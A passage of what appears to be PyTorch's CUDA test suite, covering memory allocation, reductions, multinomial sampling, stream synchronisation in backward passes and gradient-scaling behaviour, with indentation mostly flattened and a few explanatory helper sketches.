torch.cuda._sleep(int(50 * cycles_per_ms)) # delay the copy
gpu_tensor1.copy_(t, non_blocking=True)
del t
t = torch.FloatTensor([2]).pin_memory()
self.assertNotEqual(t.data_ptr(), ptr, msg='allocation re-used too soon')
with torch.cuda.device(0):
gpu_tensor0.copy_(t, non_blocking=True)
self.assertEqual(gpu_tensor1[0], 1)
self.assertEqual(gpu_tensor0[0], 2)
def test_caching_allocator_record_stream_oom(self):
"""allocations delayed by a record_stream call should still be freed on
an out-of-memory in cuda_malloc_retry. see issue #19219"""
stream = torch.cuda.Stream()
with torch.cuda.stream(stream):
y = torch.zeros(40 * 1024 * 1024, device='cuda')
for _ in range(100):
x = torch.empty(40 * 1024 * 1024, device='cuda')
with torch.cuda.stream(stream):
y += x
# delays re-use of `x` until after all operations in `stream`
x.record_stream(stream)
del x
# we've made a mess by allocating up to the device capacity. free any
# cached blocks in case it affects future tests.
torch.cuda.empty_cache()
# Tests for historic illegal memory access, see #17040.
def test_reduction_gpu_memory_accessing(self):
x = torch.ones(512, 8, dtype=torch.float32, device='cuda')
torch.sum(x, 0)
def test_sum_fp16(self):
x = torch.zeros(10, device='cuda', dtype=torch.float16)
self.assertEqual(x.sum(), 0)
x = torch.ones(65504, device='cuda', dtype=torch.float16)
self.assertEqual(x.sum(), 65504)
self.assertEqual(x.sum(dtype=torch.float32), 65504)
x = torch.ones(65536, device='cuda', dtype=torch.float16)
self.assertEqual(x.sum(dtype=torch.float32), 65536)
a = torch.zeros(1203611).bernoulli_(0.0005)
x = a.to(device='cuda', dtype=torch.float16)
self.assertEqual(x.sum().item(), a.sum().item())
a = torch.zeros(100, 121, 80).bernoulli_(0.0005)
x = a.to(device='cuda', dtype=torch.float16)
self.assertEqual(x.sum((0, 2)).float().cpu(), a.sum((0, 2)))
def test_mean_fp16(self):
x = torch.ones(65536, device='cuda', dtype=torch.float16)
self.assertEqual(x.mean(), 1)
x = torch.ones(65536, device='cuda', dtype=torch.float16)
self.assertEqual(x.mean(dtype=torch.float32), 1)
def test_prod_large(self):
# tests global reduction (should_global_reduce = true) in case of non-zero identity element
x = torch.ones(240000, device='cuda', dtype=torch.float32)
self.assertEqual(x.prod(), 1)
# test for complex types. Note 240k is divisible by 4
for dtype in [torch.cfloat, torch.cdouble]:
x = torch.ones(240000, device='cuda', dtype=dtype) * (0 + 1j)
self.assertEqual(x.prod(), 1)
def test_multinomial_ext(self):
# Test two corner cases from older PyTorch (Issue #4858)
freqs = torch.cuda.FloatTensor([
0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,
0.03178183361887932, 0.027680952101945877, 0.033176131546497345,
0.046052902936935425, 0.07742464542388916, 0.11543981730937958,
0.14148041605949402, 0.15784293413162231, 0.13180233538150787,
0.08271478116512299, 0.049702685326337814, 0.027557924389839172,
0.018125897273421288, 0.011851548217236996, 0.010252203792333603,
0.007422595750540495, 0.005372154992073774, 0.0045109698548913,
0.0036087757907807827, 0.0035267581697553396, 0.0018864056328311563,
0.0024605290964245796, 0.0022964938543736935, 0.0018453967059031129,
0.0010662291897460818, 0.0009842115687206388, 0.00045109697384759784,
0.0007791675161570311, 0.00020504408166743815, 0.00020504408166743815,
0.00020504408166743815, 0.00012302644609007984, 0.0,
0.00012302644609007984, 4.100881778867915e-05, 0.0, 0.0, 0.0, 0.0,
0.0, 0.0])
torch.cuda.manual_seed(11042)
sample = torch.multinomial(freqs, 1000, True)
self.assertNotEqual(freqs[sample].min(), 0)
p = torch.zeros(3421, 2, device="cuda", dtype=torch.float)
p[:, 1] = 1
torch.cuda.manual_seed(5214)
r = torch.multinomial(p, 1)
self.assertNotEqual(r.min().item(), 0)
# test corner case from Issue #13867
torch.cuda.manual_seed(33)
probs = torch.randn(1000000, device='cuda').clamp(min=0) * 3e-5
samples = probs.multinomial(1000000, replacement=True)
self.assertGreater(probs[samples].min().item(), 0)
@staticmethod
def mute():
os.dup2(os.open(os.devnull, os.O_WRONLY), sys.stderr.fileno())
def _spawn_method(self, method, arg):
ctx = mp.get_context("spawn")
with ctx.Pool(1, initializer=self.mute) as pool:
errors = pool.map(method, [arg])
for e in errors:
if 'device-side assert triggered' not in str(e):
self.fail(e)
@staticmethod
def _test_multinomial_invalid_probs_cuda(probs):
try:
with torch.random.fork_rng(devices=[0]):
torch.multinomial(probs.to('cuda'), 2, replacement=True)
torch.cuda.synchronize()
return False # Should not be reached
except RuntimeError as e:
return e
@slowTest
@unittest.skipIf(NO_MULTIPROCESSING_SPAWN, "Disabled for environments that \
don't support multiprocessing with spawn start method")
@skipIfRocm
def test_multinomial_invalid_probs_cuda(self):
test_method = TestCuda._test_multinomial_invalid_probs_cuda
self._spawn_method(test_method, torch.tensor([1., -1., 1.]))
self._spawn_method(test_method, torch.tensor([1., inf, 1.]))
self._spawn_method(test_method, torch.tensor([1., -inf, 1.]))
self._spawn_method(test_method, torch.tensor([1., 1., nan]))
@slowTest
@unittest.skipIf(not TEST_LARGE_TENSOR, "not enough memory")
def test_huge_index(self):
src = torch.empty(15000000, 45, device='cuda', dtype=torch.long).random_(0, 2**22)
idx = torch.randperm(src.shape[0], device='cuda')
res = src[idx]
res_cpu = src.cpu()[idx.cpu()]
self.assertEqual(res.cpu(), res_cpu)
def test_tensor_gather(self):
AbstractTestCases._TestTorchMixin._test_gather(self, lambda t: t.cuda(), False)
def test_tensor_scatter(self):
AbstractTestCases._TestTorchMixin._test_scatter_base(self, lambda t: t.cuda(), 'scatter_', test_bounds=False)
def test_tensor_scatterAdd(self):
AbstractTestCases._TestTorchMixin._test_scatter_base(self, lambda t: t.cuda(), 'scatter_add_', test_bounds=False)
def test_scatter_add_mult_index_base(self):
AbstractTestCases._TestTorchMixin._test_scatter_add_mult_index_base(self, lambda t: t.cuda())
def test_tensor_scatterFill(self):
AbstractTestCases._TestTorchMixin._test_scatter_base(self, lambda t: t.cuda(),
'scatter_', True, test_bounds=False)
def test_tensor_scatter_complex(self):
AbstractTestCases._TestTorchMixin._test_scatter_base(self, lambda t: t.cuda(),
'scatter_', test_bounds=False, test_complex=True)
def test_tensor_scatterAdd_complex(self):
AbstractTestCases._TestTorchMixin._test_scatter_base(self, lambda t: t.cuda(),
'scatter_add_', test_bounds=False, test_complex=True)
def test_tensor_scatterFill_complex(self):
AbstractTestCases._TestTorchMixin._test_scatter_base(self, lambda t: t.cuda(),
'scatter_', True, test_bounds=False, test_complex=True)
def test_min_max_inits(self):
# Testing if THC_reduceAll received the correct index initialization.
# This affects the result of THC_reduceAll operations at extreme values
x = torch.cuda.ByteTensor([0])
y = torch.cuda.ByteTensor([255])
expected = torch.cuda.LongTensor([0])[0]
_, v = x.max(dim=0)
self.assertEqual(v, expected)
_, v = y.min(dim=0)
self.assertEqual(v, expected)
@unittest.skipIf(not TEST_MULTIGPU, "only one GPU detected")
def test_get_set_rng_state_all(self):
states = torch.cuda.get_rng_state_all()
before0 = torch.cuda.FloatTensor(100, device=0).normal_()
before1 = torch.cuda.FloatTensor(100, device=1).normal_()
torch.cuda.set_rng_state_all(states)
after0 = torch.cuda.FloatTensor(100, device=0).normal_()
after1 = torch.cuda.FloatTensor(100, device=1).normal_()
self.assertEqual(before0, after0, atol=0, rtol=0)
self.assertEqual(before1, after1, atol=0, rtol=0)
def test_nvtx(self):
# Just making sure we can see the symbols
torch.cuda.nvtx.range_push("foo")
torch.cuda.nvtx.mark("bar")
torch.cuda.nvtx.range_pop()
def test_bincount_ext(self):
# ensure CUDA code coverage
input_size = (5000,)
w = torch.randn(input_size, dtype=torch.double, device='cuda')
w_cpu = w.cpu()
# test shared memory impl
t = torch.randint(50, input_size, dtype=torch.int8, device='cuda')
self.assertEqual(t.cpu().bincount(), t.bincount())
self.assertEqual(t.cpu().bincount(w_cpu), t.bincount(w))
# test multi block memory impl
# see `THRESH_NUMBER_BINS_FOR_MULTI_BLOCK_MEM` in SummaryOps.cu
t = torch.randint(500, input_size, dtype=torch.int64, device='cuda')
self.assertEqual(t.cpu().bincount(), t.bincount())
self.assertEqual(t.cpu().bincount(w_cpu), t.bincount(w))
# test global memory impl
# see `THRESH_NUMBER_BINS_FOR_GLOBAL_MEM` in SummaryOps.cu
t = torch.randint(2000, input_size, dtype=torch.int64, device='cuda')
self.assertEqual(t.cpu().bincount(), t.bincount())
self.assertEqual(t.cpu().bincount(w_cpu), t.bincount(w))
t = torch.zeros([10], dtype=torch.int32, device='cuda')
# 35488 * 65536 as int32 would overflow to a negative value,
# giving a negative bin offset
t[0] = 35488
counted = t.bincount(minlength=65536)
self.assertEqual(torch.sum(counted), 10)
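# Illustrative sketch (plain Python two's-complement arithmetic, an assumption about how
# a 32-bit bin-offset computation would wrap) for the minlength=65536 case above:
# 35488 * 65536 exceeds INT32_MAX, so a 32-bit product wraps to a negative offset.
def _int32_bin_offset_overflow_sketch():
    INT32_MAX = 2**31 - 1                            # 2147483647
    product = 35488 * 65536                          # 2325741568 > INT32_MAX
    wrapped = (product + 2**31) % 2**32 - 2**31      # simulate int32 wrap-around
    assert product > INT32_MAX
    assert wrapped == -1969225728                    # the negative "bin offset"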
def test_tiny_half_norm_(self):
a = torch.arange(25).cuda().float()
a /= 100000000
b = a.half()
self.assertGreater(b.norm().item(), 0)
def test_norm_type_conversion(self):
a = torch.ones(65536).cuda().half()
self.assertEqual(a.norm(p=0, dtype=torch.float32), 65536)
# Test that wrap_with_cuda_memory_check successfully detects leak
def test_cuda_memory_leak_detection(self):
l = []
@self.wrap_with_cuda_memory_check
def no_leak():
pass
@self.wrap_with_cuda_memory_check
def leak_gpu0():
l.append(torch.tensor(10, device=torch.device("cuda:0")))
no_leak()
with self.assertRaisesRegex(AssertionError, r"leaked \d+ bytes CUDA memory on device 0"):
leak_gpu0()
if TEST_MULTIGPU:
@self.wrap_with_cuda_memory_check
def leak_gpu1():
l.append(torch.tensor(10, device=torch.device("cuda:1")))
with self.assertRaisesRegex(AssertionError, r"leaked \d+ bytes CUDA memory on device 1"):
leak_gpu1()
def test_cuda_memory_leak_detection_propagates_errors(self):
with self.assertRaisesRegex(RuntimeError, r"The size of tensor a \(3\) must match"):
with self.assertLeaksNoCudaTensors():
x = torch.randn(3, 1, device='cuda')
y = torch.randn(2, 1, device='cuda')
z = x + y
def test_trilu_indices(self):
for test_args in tri_tests_args:
_compare_trilu_indices(self, *test_args, device='cuda')
# test default options
x = torch.ones(
3, 3, dtype=torch.long, device='cuda', layout=torch.strided)
self.assertEqual(
x.tril(0).nonzero().transpose(0, 1),
torch.tril_indices(3, 3, device='cuda'))
self.assertEqual(
x.triu(0).nonzero().transpose(0, 1),
torch.triu_indices(3, 3, device='cuda'))
def test_large_trilu_indices(self):
for test_args in tri_large_tests_args:
_compare_large_trilu_indices(self, *test_args, device='cuda')
@unittest.skipIf(not TEST_MEDIUM_TENSOR, "not enough memory")
def test_cuda_kernel_loop_overflow(self):
# Issue #24309: In extreme cases, the loop variable could overflow and continue
# the kernel loop with a negative index, causing a RuntimeError (invalid write):
x = torch.randn(1, 1, 1, 2**30 + 1, dtype=torch.float16, device="cuda")
expected = x[0, 0, 0, 2**30]
y = torch.nn.functional.avg_pool2d(x, kernel_size=1)
torch.cuda.synchronize()
self.assertEqual(y[0, 0, 0, 2**30], expected)
@unittest.skipIf(not TEST_LARGE_TENSOR, "not enough memory")
def test_cuda_kernel_loop_overflow_large(self):
# Make sure input.numel() > INT_MAX is handled:
x = torch.randn(1, 1, 1, 2**31, dtype=torch.float16, device="cuda")
with self.assertRaisesRegex(RuntimeError, "integer out of range"):
y = torch.nn.functional.avg_pool2d(x, kernel_size=1)
# Issue #24309: In extreme cases, the loop variable could overflow and continue
# the kernel loop with a negative index, causing a RuntimeError (invalid write):
x = torch.randn(1, 1, 1, 2**31 - 1, dtype=torch.float16, device="cuda")
expected = x[0, 0, 0, 2**31 - 2]
y = torch.nn.functional.avg_pool2d(x, kernel_size=1)
torch.cuda.synchronize()
self.assertEqual(y[0, 0, 0, 2**31 - 2], expected)
@skipCUDANonDefaultStreamIf(True)
def test_streaming_backwards_sync(self):
default_stream = torch.cuda.current_stream()
stream = torch.cuda.Stream()
class MultiplyInStream(torch.autograd.Function):
@staticmethod
def forward(ctx, x):
return x * 2
@staticmethod
def backward(ctx, grad):
self.assertEqual(torch.cuda.current_stream(), stream)
# delays the operation in the background stream
torch.cuda._sleep(1000 * 1000)
return grad * 2
x = torch.randn(5, 5, device='cuda', requires_grad=True)
with torch.cuda.stream(stream):
stream.wait_stream(default_stream)
output = MultiplyInStream.apply(x)
output.sum().backward()
self.assertEqual(x.grad, torch.ones_like(x) * 2)
self.assertEqual(torch.cuda.current_stream(), default_stream)
def test_streaming_backwards_multiple_streams(self):
class StreamModel(torch.nn.Module):
def __init__(self):
super(StreamModel, self).__init__()
self.event = torch.cuda.Event()
self.stream0 = torch.cuda.Stream()
self.stream1 = torch.cuda.Stream()
def forward(self, x):
x0 = x.clone()
torch._C._cuda_setStream(self.stream0._cdata)
y0 = x0 * 2
self.event.record(stream=torch.cuda.current_stream())
torch._C._cuda_setStream(self.stream1._cdata)
y1 = x * 3
self.stream1.wait_event(self.event)
return y0 + y1
stream = torch.cuda.Stream()
def accum_hook(grad):
self.assertEqual(torch.cuda.current_stream(), stream)
with torch.cuda.stream(stream):
x = torch.randn(5, 5, device='cuda', requires_grad=True)
x.register_hook(accum_hook)
torch.cuda.current_stream().wait_stream(stream)
model = StreamModel().cuda()
model(x).sum().backward()
self.assertEqual(x.grad, torch.ones_like(x) * 5)
@unittest.skipIf(not TEST_MULTIGPU, "only one GPU detected")
def test_streaming_backwards_device_transfer(self):
# This function must run with non-default current streams on all devices, otherwise it's meaningless.
# The intention is to test that to()'s backward (CopyBackward) interacts properly with the
# synchronization logic in torch/csrc/autograd/input_buffer.cpp.
dev0 = torch.device("cuda:0")
dev1 = torch.device("cuda:1")
# Unfortunately I need to make the tensors largeish.
# Bigger tensors = longer D2D transfers = more likely to expose races.
size = 2**26
a = torch.full((size,), 1, device=dev1, dtype=torch.float64, requires_grad=True)
b = torch.full((size,), 1, device=dev1, dtype=torch.float64, requires_grad=True)
# Here to_backward_recipient = a*b is used only once, so MulBackward's InputBuffer slot only expects 1 input.
# This tests the situation where we don't call InputBuffer::accumulate for MulBackward's InputBuffer.
to_backward_recipient = a * b
s = to_backward_recipient.to(device="cuda:0").sum()
torch.cuda.synchronize(device=dev0)
torch.cuda.synchronize(device=dev1)
s.backward()
self.assertTrue(a.grad.sum().item() == size)
self.assertTrue(b.grad.sum().item() == size)
# Here to_backward_recipient = a*b is used twice, so MulBackward's InputBuffer slot expects 2 inputs.
# This tests the situation where we do call InputBuffer::accumulate for MulBackward's InputBuffer.
a.grad = None
b.grad = None
to_backward_recipient = a * b
# Multiply by 2 here so to's backward creates gradient values that are different from the case above,
# to mitigate weirdness if the caching allocator happens to reuse memory regions that were populated
# with 1s by the case above
s0 = to_backward_recipient.to(device="cuda:0").sum() * 2.
s1 = to_backward_recipient.to(device="cuda:0").sum() * 2.
torch.cuda.synchronize(device=dev0)
torch.cuda.synchronize(device=dev1)
s0.backward(retain_graph=True)
s1.backward()
self.assertTrue(a.grad.sum().item() == 4 * size)
self.assertTrue(b.grad.sum().item() == 4 * size)
def test_streaming_backward_sync_graph_root(self):
# This function tests if bwd ops running on a side stream properly sync with the GraphRoot.
# The potential bug it targets is a race condition. The test uses multiple trials and
# torch.cuda._sleep such that if the race condition exists, the test will almost certainly fail,
# but there's a chance it may spuriously pass. Passing does not guarantee the backend is bug-free,
# but failure does guarantee there is a bug.
fwd_bwd_op_stream = torch.cuda.Stream()
bwd_ambient_stream = torch.cuda.Stream()
# We need these streams to be different, otherwise the test is meaningless.
self.assertTrue(fwd_bwd_op_stream != bwd_ambient_stream)
size = int(1e3)
a = torch.full((size,), 2.0, device="cuda", requires_grad=True)
b = torch.full((size,), 3.0, device="cuda", requires_grad=True)
# I don't think we need any manual record_streams below.
# a and b remain in scope for the entire test.
# c and grad remain in scope for each iteration, and there's a full sync between iterations.
for trial in range(5):
torch.cuda.synchronize()
a.grad = b.grad = None
with torch.cuda.stream(fwd_bwd_op_stream):
c = a * b
with torch.cuda.stream(bwd_ambient_stream):
torch.cuda.synchronize()
# Long-running dummy kernel on bwd_ambient_stream delays filling of grad
torch.cuda._sleep(int(50 * get_cycles_per_ms()))
# Fills grad on bwd_ambient_stream
grad = torch.full((size,), float(trial + 1), device="cuda")
# Bwd ops still run on fwd_bwd_ops_stream, so the following will likely fail if
# bwd ops don't sync with bwd_ambient_stream before consuming grad.
torch.autograd.backward(tensors=c, grad_tensors=grad)
# See https://github.com/pytorch/pytorch/issues/47028
# The assertEqual calls below run on bwd_ambient_stream, so this test may also fail
# if backward() fails to sync with bwd_ambient_stream at the end.
# Synchronizing here works around the issue until a proper fix can be made.
torch.cuda.synchronize()
with torch.no_grad():
self.assertEqual(a.grad, grad * b)
self.assertEqual(b.grad, grad * a)
@unittest.skipIf(not TEST_MULTIGPU, "only one GPU detected")
@unittest.skipIf(IS_SANDCASTLE or IS_REMOTE_GPU, "Does not work on Sandcastle")
def test_cuda_init_race(self):
# See https://github.com/pytorch/pytorch/issues/16559
import subprocess
subprocess.check_call([sys.executable, '-c', """\
import torch
import threading
def worker(rank):
torch.tensor([1.]).cuda(rank)
t1 = threading.Thread(target=worker, args=(0,))
t2 = threading.Thread(target=worker, args=(1,))
t1.start()
t2.start()
"""])
# ROCm doesn't support device side asserts
@skipIfRocm
def test_fixed_cuda_assert_async(self):
with self.assertRaisesRegex(RuntimeError, "Boolean value of Tensor with no values is ambiguous"):
torch._assert_async(torch.tensor([], device="cuda"))
with self.assertRaisesRegex(RuntimeError, "Boolean value of Tensor with more than one value is ambiguous"):
torch._assert_async(torch.tensor([0, 0], device="cuda"))
torch._assert_async(torch.tensor(1, device="cuda"))
torch._assert_async(torch.tensor(0.1, device="cuda"))
torch._assert_async(torch.tensor(-0.1, device="cuda"))
torch._assert_async(torch.tensor(True, device="cuda"))
torch._assert_async(torch.tensor(0 + 0.1j, device="cuda"))
fail_stmts = [
"torch._assert_async(torch.tensor(0, device='cuda'))",
"torch._assert_async(torch.tensor(0.0, device='cuda'))",
"torch._assert_async(torch.tensor(False, device='cuda'))",
"torch._assert_async(torch.tensor(0 + 0j, device='cuda'))",
]
import subprocess
for stmt in fail_stmts:
with self.subTest(stmt=stmt):
r = subprocess.call([sys.executable, '-c', f"""\
import torch
{stmt}
torch.cuda.synchronize()
"""])
self.assertTrue(r != 0)
def test_grad_scaling_unscale(self, dtype=torch.float):
inv_scale = torch.full((1,), 0.25, dtype=torch.float, device="cuda:0")
found_inf = torch.full((1,), 0.0, dtype=torch.float, device="cuda:0")
size = 10
g = torch.full((size, size), 4.0, dtype=dtype, device="cuda:0")
ginf = g.clone()
ginf[2, 2] = float('inf')
gnan = g.clone()
gnan[2, 2] = float('nan')
# Tries selected combinations of
# - contiguous grads
# - g.clone().t() which is not contiguous but still non-overlapping and dense
# - variants of g.clone()[:, :5] which are not non-overlapping and dense
# Non-overlapping-and-dense grads route into a multi-tensor-apply kernel;
# others use a fallback per-tensor kernel, so we should try both.
cases = (
([g.clone(), g.clone()], False),
([g.clone(), g.clone().t()], False),
([g.clone(), g.clone()[:, :5]], False),
([g.clone()[:, :5], g.clone()[:, :5]], False),
([g.clone(), ginf.clone()], True),
([g.clone(), gnan.clone()], True),
([g.clone(), ginf.clone()[:, :5]], True),
([g.clone(), gnan.clone()[:, :5]], True),
([ginf.clone(), g.clone()[:, :5]], True),
([ginf.clone()[:, :5], g.clone()[:, :5]], True),
)
for grads, has_inf in cases:
found_inf.zero_()
torch._amp_foreach_non_finite_check_and_unscale_(grads, found_inf, inv_scale)
if has_inf:
self.assertEqual(found_inf, 1.0)
else:
self.assertEqual(found_inf, 0.0)
for grad in grads:
self.assertTrue(torch.allclose(grad, torch.ones_like(grad), atol=1e-7))
# When passing lists with mismatched dtypes to a raw
# _amp_foreach_non_finite_check_and_unscale_ call,
# it's expected to fall back to single-tensor TensorIterator kernel.
grads = [g.clone(), g.to(dtype=torch.float16)]
torch._amp_foreach_non_finite_check_and_unscale_(grads, found_inf, inv_scale)
for grad in grads:
self.assertTrue(torch.allclose(grad, torch.ones_like(grad), atol=1e-7))
# Passing lists with mismatched devices to a raw
# _amp_foreach_non_finite_check_and_unscale_ call should raise errors.
if TEST_MULTIGPU:
with self.assertRaisesRegex(RuntimeError, r"Expected all tensors to be on the same device"):
torch._amp_foreach_non_finite_check_and_unscale_([g.clone(), g.to(device="cuda:1")],
found_inf,
inv_scale)
# Creates a list of grads with mismatched dtypes and devices, to ensure
# scaler._unscale_grads_ organizes grads by dtype and device before calling
# _amp_foreach_non_finite_check_and_unscale_ on each set.
# If inject_inf >= 0, writes an inf into one grad for _unscale_grads_ to find.
def perfect_storm_grads(inject_inf):
grads = [g.clone(), g.clone()[:, :5], g.to(dtype=torch.float16), g.to(dtype=torch.float16)]
if TEST_MULTIGPU:
grads += [g.to(device="cuda:1"),
g.to(device="cuda:1")[:, :5],
g.to(device="cuda:1", dtype=torch.float16),
g.to(device="cuda:1", dtype=torch.float16)]
if inject_inf >= 0:
grads[inject_inf][2, 2] = float('inf')
return grads
scaler = torch.cuda.amp.GradScaler()
dummy_params = [torch.empty_like(g) for g in perfect_storm_grads(-1)]
dummy_opt = torch.optim.SGD(dummy_params, lr=1.)
# Ensures the inf/nan checking can find an inf injected onto any grad in the perfect storm.
for inject_inf in range(-1, len(dummy_params)):
found_inf = torch.full((1,), 0.0, dtype=torch.float, device="cuda:0")
grads = perfect_storm_grads(inject_inf)
for i, p in enumerate(dummy_params):
p.grad = grads[i]
found_inf_per_device = scaler._unscale_grads_(dummy_opt, inv_scale, found_inf, True)
if inject_inf < 0:
# No inf was injected, ensures unscaling worked normally.
self.assertTrue(sum(v.item() for v in found_inf_per_device.values()) == 0)
for grad in grads:
self.assertTrue(torch.allclose(grad, torch.ones_like(grad), atol=1e-7))
else:
# inf was injected, ensures inf was found.
self.assertTrue(sum(v.item() for v in found_inf_per_device.values()) == 1)
def test_grad_scaling_update_scale(self, device="cuda", dtype=torch.float):
growth = 2.0
backoff = 0.25
growth_interval = 2
scale = torch.full((1,), 4.0, dtype=dtype, device=device)
growth_tracker = torch.full((1,), 0.0, dtype=torch.int32, device=device)
found_inf = torch.full((1,), 0.0, dtype=torch.float, device="cuda:0")
# Simulates 2 consecutive unskipped iterations
torch._amp_update_scale_(scale, growth_tracker, found_inf, growth, backoff, growth_interval)
self.assertEqual(growth_tracker, 1)
self.assertEqual(scale, 4.0)
torch._amp_update_scale_(scale, growth_tracker, found_inf, growth, backoff, growth_interval)
self.assertEqual(growth_tracker, 0)
self.assertEqual(scale, 8.0)
# Simulates a skipped iteration
found_inf.fill_(1.0)
torch._amp_update_scale_(scale, growth_tracker, found_inf, growth, backoff, growth_interval)
self.assertEqual(growth_tracker, 0)
self.assertEqual(scale, 2.0)
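# Minimal pure-Python sketch of the behaviour exercised above (an illustration of the
# expected semantics, not the actual _amp_update_scale_ kernel): grow the scale after
# `growth_interval` consecutive clean iterations, back off and reset the tracker
# whenever an inf/nan was found.
def _update_scale_sketch(scale, growth_tracker, found_inf,
                         growth=2.0, backoff=0.25, growth_interval=2):
    if found_inf:
        return scale * backoff, 0
    growth_tracker += 1
    if growth_tracker == growth_interval:
        return scale * growth, 0
    return scale, growth_tracker
def _update_scale_demo():
    # Reproduces the asserted sequence: 4.0 -> 4.0 -> 8.0, then a skipped iteration
    # backs the scale off to 2.0.
    s, t = _update_scale_sketch(4.0, 0, False)     # -> (4.0, 1)
    s, t = _update_scale_sketch(s, t, False)       # -> (8.0, 0)
    s, t = _update_scale_sketch(s, t, True)        # -> (2.0, 0)
    assert (s, t) == (2.0, 0)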
def test_grad_scaling_unscale_sparse(self, device="cuda", dtype=torch.float):
scaler = torch.cuda.amp.GradScaler()
inv_scale = torch.full((1,), 0.25, dtype=dtype, device=device)
found_inf = torch.empty((1,), dtype=dtype, device=device)
cur = found_inf.device
# As of d0c925f (4/16/20), docs are unclear about best API for sparse cuda tensor construction.
# https://pytorch.org/docs/master/tensors.html shows torch.sparse_coo_tensor(...), but it has no docstring.
# The same page shows several tensors with layout=torch.sparse_coo, but no constructors using that layout.
# Meanwhile, https://pytorch.org/docs/master/sparse.html shows torch.sparse.FloatTensor(...), which looks
# legacy and does not accept a device="cuda" kwarg. Going with torch.sparse_coo_tensor.
i = torch.tensor([[0, 1, 1],
[2, 0, 2]], device="cuda", dtype=torch.int64)
v = torch.tensor([16., 32., 64.], device="cuda", dtype=torch.float)
s = torch.sparse_coo_tensor(i, v, torch.Size([2, 3]), device="cuda", dtype=dtype)
p = s.clone()
assert p.is_sparse
opt = torch.optim.SGD([p], lr=1.)
p.grad = s.clone()
found_inf.zero_()
found_inf = scaler._unscale_grads_(opt, inv_scale, found_inf, False)[cur]
self.assertEqual(found_inf, 0.0)
self.assertTrue(torch.allclose(p.grad.to_dense(), (s / 4).to_dense()))
v = torch.FloatTensor([16., 32., float('inf')])
p.grad = torch.sparse_coo_tensor(i, v, torch.Size([2, 3]), device="cuda", dtype=dtype)
found_inf.zero_()
found_inf = scaler._unscale_grads_(opt, inv_scale, found_inf, False)[cur]
self.assertEqual(found_inf, 1.0)
v = torch.FloatTensor([16., 32., float('nan')])
p.grad = torch.sparse_coo_tensor(i, v, torch.Size([2, 3]), device="cuda", dtype=dtype)
found_inf.zero_()
found_inf = scaler._unscale_grads_(opt, inv_scale, found_inf, False)[cur]
self.assertEqual(found_inf, 1.0)
p = s.clone().half()
assert p.is_sparse
opt = torch.optim.SGD([p], lr=1.)
p.grad = s.clone().half()
found_inf.zero_()
found_inf = scaler._unscale_grads_(opt, inv_scale, found_inf, True)[cur]
self.assertEqual(found_inf, 0.0)
self.assertTrue(torch.allclose(p.grad.to_dense(), (s.half() / 4).to_dense()))
# Creates fp16 sparse tensor with duplicated indices (uncoalesced). The uncoalesced representation
# does not overflow in fp16, but the coalesced representation would, because 64000 + 64000 > fp16 max.
# _amp_non_finite_check_and_unscale_ should report an overflow here.
i = torch.LongTensor([[0, 1, 0],
[2, 0, 2]])
v = torch.FloatTensor([64000., 32., 64000.])
p.grad = torch.sparse_coo_tensor(i, v, torch.Size([2, 3]), device="cuda", dtype=torch.float16)
found_inf.zero_()
found_inf = scaler._unscale_grads_(opt, inv_scale, found_inf, True)[cur]
self.assertEqual(found_inf, 1.0)
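# Illustrative sketch (CPU-only) of the coalescing overflow described above: each
# duplicated value is finite in fp16, but their coalesced sum, 64000 + 64000 = 128000,
# exceeds the fp16 maximum of 65504 and becomes inf.
def _fp16_duplicate_index_overflow_sketch():
    a = torch.tensor(64000., dtype=torch.float16)
    b = torch.tensor(64000., dtype=torch.float16)
    assert torch.isfinite(a) and torch.isfinite(b)
    assert torch.isinf(a + b)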
@unittest.skipIf(not TEST_MULTIGPU, "only one GPU detected")
def test_grad_scaling_device_as_key(self):
# Ensure that different instances of "device" objects that point to the same device
# are treated as identical keys by dicts. GradScaler relies on this behavior, and may
# error otherwise in a way that's difficult to detect (a silent performance hit).
d = {}
t = torch.empty((1,), device="cuda:0")
dev0a = torch.device("cuda:0")
dev0b = torch.device("cuda:0")
dev1a = torch.device("cuda:1")
dev1b = torch.device("cuda:1")
self.assertTrue(hash(dev0a) == hash(dev0b))
self.assertTrue(hash(dev1a) == hash(dev1b))
d[dev0a] = "0a"
d[dev0b] = "0b"
self.assertTrue(len(d) == 1)
self.assertTrue(d[dev0a] == "0b")
d[t.device] = "t"
self.assertTrue(len(d) == 1)
self.assertTrue(d[dev0a] == "t")
d[dev1a] = "1a"
d[dev1b] = "1b"
self.assertTrue(len(d) == 2)
self.assertTrue(d[dev1a] == "1b")
@unittest.skipIf(not TEST_MULTIGPU, "only one GPU detected")
def test_grad_scaling_scale(self):
scaler = torch.cuda.amp.GradScaler(init_scale=2.)
t0 = torch.full((1,), 4.0, dtype=torch.float32, device="cuda:0")
t1 = torch.full((1,), 4.0, dtype=torch.float32, device="cuda:1")
# Create some nested iterables of tensors on different devices.
outputs = (t1.clone(), (t0.clone(), t1.clone()), [t0.clone(), (t1.clone(), t0.clone())])
outputs = scaler.scale(outputs)
self.assertTrue(outputs[0] == 8.0 and outputs[1][0] == 8.0 and outputs[1][1] == 8.0 and
outputs[2][0] == 8.0 and outputs[2][1][0] == 8.0 and outputs[2][1][1] == 8.0)
self.assertTrue(scaler._scale.device == t1.device)
def test_grad_scaling_state_dict(self):
for lazy_init_scale in True, False:
s0 = torch.cuda.amp.GradScaler(init_scale=3., growth_factor=4., backoff_factor=.5, growth_interval=2)
s1 = torch.cuda.amp.GradScaler(init_scale=6., growth_factor=7., backoff_factor=.8, growth_interval=1)
# sets a random value for load_state_dict to overwrite
s1._init_growth_tracker = 7
if lazy_init_scale:
# Dummy scale() call to ensure the scale tensor is lazily initialized.
s1.scale(torch.full((1,), 4.0, dtype=torch.float32, device="cuda:0"))
self.assertTrue(isinstance(s1._scale, torch.cuda.FloatTensor))
s1.load_state_dict(s0.state_dict())
self.assertEqual(s1.get_scale(), 3.)
self.assertEqual(s1.get_growth_factor(), 4.)
self.assertEqual(s1.get_backoff_factor(), .5)
self.assertEqual(s1.get_growth_interval(), 2)
self.assertEqual(s1._init_growth_tracker, 0)
def _create_scaling_models_optimizers(self, device="cuda"):
# Create a module+optimizer that will use scaling, and a control module+optimizer
# that will not use scaling, against which the scaling-enabled module+optimizer can be compared.
mod_control = torch.nn.Sequential(torch.nn.Linear(8, 8), torch.nn.Linear(8, 8)).to(device=device)
mod_scaling = torch.nn.Sequential(torch.nn.Linear(8, 8), torch.nn.Linear(8, 8)).to(device=device)
for c, s in zip(mod_control.parameters(), mod_scaling.parameters()):
